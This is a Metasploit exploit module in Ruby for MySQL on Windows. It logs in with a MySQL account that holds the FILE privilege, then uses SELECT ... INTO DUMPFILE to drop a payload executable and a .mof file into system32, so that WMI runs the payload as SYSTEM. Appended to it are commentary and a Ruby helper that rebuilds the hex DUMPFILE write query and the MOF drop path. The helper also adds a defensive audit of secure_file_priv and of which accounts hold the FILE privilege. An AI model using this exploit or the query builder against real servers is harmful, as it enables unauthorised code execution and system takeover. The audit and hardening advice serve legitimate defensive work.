##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::WbemExec
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Oracle MySQL for Microsoft Windows MOF Execution',
      'Description'    => %q{
        This module takes advantage of a file privilege misconfiguration
        specifically against Windows MySQL servers: an account holding the
        FILE privilege uses SELECT ... INTO DUMPFILE to drop a payload
        executable and a .mof file into the WMI autocompile directory,
        which may result in arbitrary code execution under the context of
        SYSTEM. Note that in order to use this module you must have a
        valid MySQL account on the target machine.
      },
      'Author'         =>
        [
          'kingcope',
          'sinn3r'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2012-5613'], # DISPUTED
          ['EDB', '23083'],
          ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13']
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'MySQL on Windows', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Dec 01 2012'
    ))

    register_options(
      [
        OptString.new('USERNAME', [ true, 'The username to authenticate as']),
        OptString.new('PASSWORD', [ true, 'The password to authenticate with'])
      ])
  end

  def check
    begin
      m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
    rescue RbMysql::AccessDeniedError
      print_error("#{peer} - Access denied.")
      return Exploit::CheckCode::Safe
    end

    return Exploit::CheckCode::Appears if is_windows?
    return Exploit::CheckCode::Safe
  end

  def peer
    "#{rhost}:#{rport}"
  end

  # Run a query and collect the result rows as hashes. An empty array means
  # the statement returned no result set or failed to parse.
  def query(q)
    rows = []
    begin
      res = mysql_query(q)
      return rows if not res
      res.each_hash do |row|
        rows << row
      end
    rescue RbMysql::ParseError
      return rows
    end

    return rows
  end

  # The server reports its build platform in @@version_compile_os
  # (e.g. "Win32" or "Win64").
  def is_windows?
    r = query("SELECT @@version_compile_os;")
    return (r[0]['@@version_compile_os'] =~ /^Win/) ? true : false
  end

  # Derive the system drive letter from the server's tmpdir setting.
  def get_drive_letter
    r = query("SELECT @@tmpdir;")
    drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || ''
    return drive
  end

  # Write arbitrary bytes to a path on the server. The payload is sent as a
  # hex literal and DUMPFILE writes it verbatim, so binaries survive intact.
  # Requires the FILE privilege and an unrestricted secure_file_priv.
  def upload_file(bin, dest)
    p = bin.unpack("H*")[0]
    query("SELECT 0x#{p} into DUMPFILE '#{dest}'")
  end

  def exploit
    print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")
    begin
      m = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])
      return if not m
    rescue RbMysql::AccessDeniedError
      print_error("#{peer} - Access denied.")
      return
    end

    if not is_windows?
      print_error("#{peer} - Remote host isn't Windows.")
      return
    end

    drive    = get_drive_letter
    exe_name = Rex::Text::rand_text_alpha(5) + ".exe"
    dest     = "#{drive}:/windows/system32/#{exe_name}"
    exe      = generate_payload_exe
    print_status("#{peer} - Uploading to '#{dest}'")
    begin
      upload_file(exe, dest)
      # Cleanup path is relative to the session's working directory (system32).
      register_file_for_cleanup("#{exe_name}")
    rescue RbMysql::AccessDeniedError
      print_error("#{peer} - No permission to write. I blame kc :-)")
      return
    end

    mof_name = Rex::Text::rand_text_alpha(5) + ".mof"
    dest     = "#{drive}:/windows/system32/wbem/mof/#{mof_name}"
    mof      = generate_mof(mof_name, exe_name)
    print_status("#{peer} - Uploading to '#{dest}'")
    begin
      upload_file(mof, dest)
      # Once compiled, Windows moves the .mof into wbem\mof\good.
      register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
    rescue RbMysql::AccessDeniedError
      print_error("#{peer} - No permission to write. Bail!")
      return
    end
  end
end
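The module rests on two MySQL primitives: a hex literal written out with `SELECT ... INTO DUMPFILE` (which needs the FILE privilege and is blocked when `secure_file_priv` is NULL or points at a directory), and a platform check through `@@version_compile_os` / `@@tmpdir`. Two caveats a practitioner should know: the `wbem\mof` autocompile behaviour that turns the dropped file into code execution exists on Windows XP and Server 2003, later versions leave the file unprocessed; and recent MySQL installers set `secure_file_priv` to a dedicated directory by default, so the write to `system32` fails. The following is an added example, not part of the Metasploit module above, written as plain Ruby that runs offline against constructed query results. The module name `MysqlMofHelper`, the `exposure_report` method and the sample rows are assumptions for illustration; the SQL strings are standard MySQL.

```ruby
# Added example (not Metasploit code): the MySQL primitives behind the MOF
# drop, plus a defensive check an auditor can run against SHOW VARIABLES and
# mysql.user output. Method names here are illustrative assumptions.
module MysqlMofHelper
  # Queries an auditor runs to decide whether the server can be abused for
  # arbitrary file writes (standard MySQL SQL).
  AUDIT_QUERIES = {
    secure_file_priv: "SHOW VARIABLES LIKE 'secure_file_priv'",
    file_priv_users:  "SELECT CONCAT(user, '@', host) AS acct FROM mysql.user WHERE File_priv = 'Y'",
    platform:         "SELECT @@version_compile_os"
  }.freeze

  # Build the statement that writes raw bytes to a server-side path. The
  # payload is sent as a hex literal, so no byte needs quoting; DUMPFILE
  # writes the value verbatim (INTO OUTFILE would add line terminators and
  # escaping, corrupting a PE file).
  def self.dumpfile_query(bytes, dest)
    hex = bytes.b.unpack1('H*')
    # MySQL on Windows accepts forward slashes, which also sidesteps
    # backslash escaping inside the string literal.
    "SELECT 0x#{hex} INTO DUMPFILE '#{dest.tr('\\', '/')}'"
  end

  # Same test the module applies to @@version_compile_os ("Win32"/"Win64").
  def self.windows?(version_compile_os)
    version_compile_os.to_s.start_with?('Win')
  end

  # Drive letter from @@tmpdir, e.g. "C:\\Windows\\TEMP\\" -> "C".
  def self.drive_letter(tmpdir)
    m = tmpdir.to_s.match(/\A([A-Za-z]):/)
    m ? m[1] : nil
  end

  # The WMI autocompile drop location the module writes the .mof into.
  def self.mof_drop_path(drive, mof_name)
    "#{drive}:/windows/system32/wbem/mof/#{mof_name}"
  end

  # Defensive check. secure_file_priv: nil (NULL) disables file import/export,
  # '' (empty) allows any path the mysqld process can write, a directory
  # confines writes to that directory. file_priv_users: rows from the
  # mysql.user query above.
  def self.exposure_report(secure_file_priv:, file_priv_users:, version_compile_os:)
    unrestricted = secure_file_priv == ''
    findings = []
    findings << 'secure_file_priv is empty: INTO DUMPFILE may write anywhere mysqld can' if unrestricted
    findings << "FILE privilege held by: #{file_priv_users.join(', ')}" unless file_priv_users.empty?
    findings << 'Windows build: the service account decides which paths DUMPFILE reaches' if windows?(version_compile_os)
    {
      arbitrary_file_write: unrestricted && !file_priv_users.empty?,
      findings: findings
    }
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample results standing in for a live server.
  report = MysqlMofHelper.exposure_report(
    secure_file_priv: '',
    file_priv_users: ['root@%'],
    version_compile_os: 'Win64'
  )
  puts report[:findings]
  puts MysqlMofHelper.dumpfile_query("MZ\x90\x00".b, 'C:\\windows\\system32\\abcde.exe')
end
```

A server where `exposure_report` returns `arbitrary_file_write: true` is the precondition the module needs; setting `secure_file_priv` to a directory (or NULL) and revoking FILE from network-reachable accounts closes the write primitive regardless of whether the host still honours the MOF autocompile directory.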